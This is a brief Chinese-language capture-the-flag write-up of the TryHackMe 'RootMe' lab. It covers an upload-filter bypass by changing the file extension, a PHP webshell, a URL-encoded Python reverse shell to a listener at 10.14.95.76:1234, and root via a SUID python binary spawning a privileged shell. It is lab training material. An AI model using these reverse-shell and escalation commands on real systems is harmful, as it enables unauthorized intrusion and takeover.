[thm] RootMe
[thm] RootMe
information
端口扫描
panel
改个后缀就可以成功上传了,但是反弹shell居然用不了,可能是php版本问题,换个一句话🐎上去。
user1
python3%20-c%20’import%20os,pty,socket;s=socket.socket();s.connect((“10.14.95.76”,1234));[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn(“sh”)’
换了python3的反弹shell拿下用户
root
./python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
有蟒蛇啊有蟒蛇!
conclution
- 看了upload的代码,预期是用php5之类的后缀绕过,所以phtml用不了
- 不必局限于一种方式。
This post is licensed under CC BY 4.0 by the author.